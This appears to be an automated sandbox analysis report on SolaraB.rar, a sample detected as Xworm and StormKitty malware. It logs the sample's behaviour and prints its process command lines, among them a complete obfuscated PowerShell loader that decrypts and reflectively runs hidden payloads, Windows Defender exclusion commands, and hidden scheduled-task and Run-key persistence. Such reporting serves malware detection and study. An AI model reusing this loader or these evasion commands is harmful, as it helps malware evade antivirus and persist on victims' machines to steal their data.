Analysis Overview
SHA256
e2f53b76060c0115efe12f3e6a8c2f0b27caed7a4d471b85d318b21de6cfe0c7
Threat Level: Known bad
The file SolaraB.rar was found to be: Known bad.
Malicious Activity Summary
StormKitty
Xworm
Detect Xworm Payload
StormKitty payload
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Themida packer
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Unsigned PE
Program crash
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Checks processor information in registry
Scheduled Task/Job: Scheduled Task
Suspicious use of SetWindowsHookEx
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-24 05:34
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-24 05:34
Reported
2024-06-24 05:39
Platform
win7-20240508-en
Max time kernel
59s
Max time network
188s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\SolaraB\SolaraBootstrapper.exe |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\SolaraB\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB\SolaraBootstrapper.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6a69758,0x7fef6a69768,0x7fef6a69778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2208 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2216 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1120 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1368 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3272 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 988
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3300 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3024 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=2212 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=1940 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3368 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2512 --field-trial-handle=1280,i,7710101898095155769,12964431675611064333,131072 /prefetch:1
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-24 05:34
Reported
2024-06-24 05:39
Platform
win10v2004-20240226-en
Max time kernel
142s
Max time network
235s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB\SolaraBootstrapper.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\XClient.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\SolaraB\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB\SolaraBootstrapper.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Solara\Solara_Protect.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQhMtkbsVgtPIj+9hlMIsCH2Pou/2Q6I1Z8AAFEZJho='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ptE5ELI448W/24fFf9TlYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KxrKd=New-Object System.IO.MemoryStream(,$param_var); $GIOzm=New-Object System.IO.MemoryStream; $hKjjR=New-Object System.IO.Compression.GZipStream($KxrKd, [IO.Compression.CompressionMode]::Decompress); $hKjjR.CopyTo($GIOzm); $hKjjR.Dispose(); $KxrKd.Dispose(); $GIOzm.Dispose(); $GIOzm.ToArray();}function execute_function($param_var,$param2_var){ $ZWVgR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EybCe=$ZWVgR.EntryPoint; $EybCe.Invoke($null, $param2_var);}$RvTul = 'C:\Users\Admin\AppData\Local\Solara\Solara_Protect.bat';$host.UI.RawUI.WindowTitle = $RvTul;$KBDbz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($RvTul).Split([Environment]::NewLine);foreach ($OSADB in $KBDbz) { if ($OSADB.StartsWith(':: ')) { $uOIYZ=$OSADB.Substring(3); break; }}$payloads_var=[string[]]$uOIYZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.0.76890781\209718544" -parentBuildID 20221007134813 -prefsHandle 1812 -prefMapHandle 1804 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f8539d5f-bf0e-4597-bf7c-d082a9a6e20f} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 1904 1e7853f8b58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.1.521831789\1806776855" -parentBuildID 20221007134813 -prefsHandle 2316 -prefMapHandle 2312 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {993fbfea-4096-4a36-ae1b-b92e5e6254a4} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 2344 1e7852f0a58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.2.179795202\897035016" -childID 1 -isForBrowser -prefsHandle 3056 -prefMapHandle 2952 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80d1f89b-3fd6-4cbe-b982-039a359988b8} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 3208 1e7895c5f58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.3.1866736029\1043454601" -childID 2 -isForBrowser -prefsHandle 3588 -prefMapHandle 3584 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {adb4d41e-da09-49c1-814a-8dac9250351e} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 3600 1e7f185f558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.4.191300101\788793555" -childID 3 -isForBrowser -prefsHandle 4532 -prefMapHandle 4648 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39092794-236a-474e-9a59-ccbcf7ae6f29} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 4656 1e78b2a9758 tab
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_469_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_469.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.5.606891755\296892075" -childID 4 -isForBrowser -prefsHandle 5072 -prefMapHandle 5052 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {baaa3045-3e25-4242-bda9-29c1dd1edfc1} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 5068 1e78bbb6958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.6.1038430401\797689001" -childID 5 -isForBrowser -prefsHandle 5208 -prefMapHandle 5212 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14b840a9-3594-4c9e-ae0d-5e194c594c4c} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 5200 1e78bbb5158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.7.725132788\1837089629" -childID 6 -isForBrowser -prefsHandle 5396 -prefMapHandle 5400 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5603c1c0-600a-4945-8a4b-7863c8b1ae7d} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 5388 1e78bbb5458 tab
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3700 --field-trial-handle=2272,i,4858140932023865871,5726683989663339295,262144 --variations-seed-version /prefetch:8
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.8.418852028\1251578625" -childID 7 -isForBrowser -prefsHandle 5072 -prefMapHandle 5232 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14569905-487d-4b11-916e-16e85afa5ad7} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 5964 1e789524e58 tab
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_469.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_469.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQhMtkbsVgtPIj+9hlMIsCH2Pou/2Q6I1Z8AAFEZJho='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ptE5ELI448W/24fFf9TlYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KxrKd=New-Object System.IO.MemoryStream(,$param_var); $GIOzm=New-Object System.IO.MemoryStream; $hKjjR=New-Object System.IO.Compression.GZipStream($KxrKd, [IO.Compression.CompressionMode]::Decompress); $hKjjR.CopyTo($GIOzm); $hKjjR.Dispose(); $KxrKd.Dispose(); $GIOzm.Dispose(); $GIOzm.ToArray();}function execute_function($param_var,$param2_var){ $ZWVgR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EybCe=$ZWVgR.EntryPoint; $EybCe.Invoke($null, $param2_var);}$RvTul = 'C:\Users\Admin\AppData\Roaming\startup_str_469.bat';$host.UI.RawUI.WindowTitle = $RvTul;$KBDbz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($RvTul).Split([Environment]::NewLine);foreach ($OSADB in $KBDbz) { if ($OSADB.StartsWith(':: ')) { $uOIYZ=$OSADB.Substring(3); break; }}$payloads_var=[string[]]$uOIYZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.9.1927054615\213791461" -childID 8 -isForBrowser -prefsHandle 3528 -prefMapHandle 2824 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5db436d-d670-43de-9d74-57874eabc025} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 3068 1e7852f2558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.10.303666136\2016900388" -parentBuildID 20221007134813 -prefsHandle 3548 -prefMapHandle 4692 -prefsLen 26725 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48f6e0fb-f892-4356-b074-03fe73e635ca} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 3068 1e785656d58 rdd
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\XClient.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\XClient.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
"C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --edge-webview-custom-scheme --enable-features=MojoIpcz --mojo-named-platform-channel-pipe=6464.7052.9511635907052121146
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=122.0.2365.52 --initial-client-data=0x15c,0x160,0x164,0x138,0x170,0x7ffdb24e2e98,0x7ffdb24e2ea4,0x7ffdb24e2eb0
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.11.1903525523\1222888480" -childID 9 -isForBrowser -prefsHandle 10084 -prefMapHandle 10044 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9376c6cd-f39a-4f3c-93be-d228b2408934} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 10100 1e78560cd58 tab
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --edge-webview-custom-scheme --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1788 --field-trial-handle=1792,i,6703705014908041025,9148991447950061504,262144 --enable-features=MojoIpcz --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
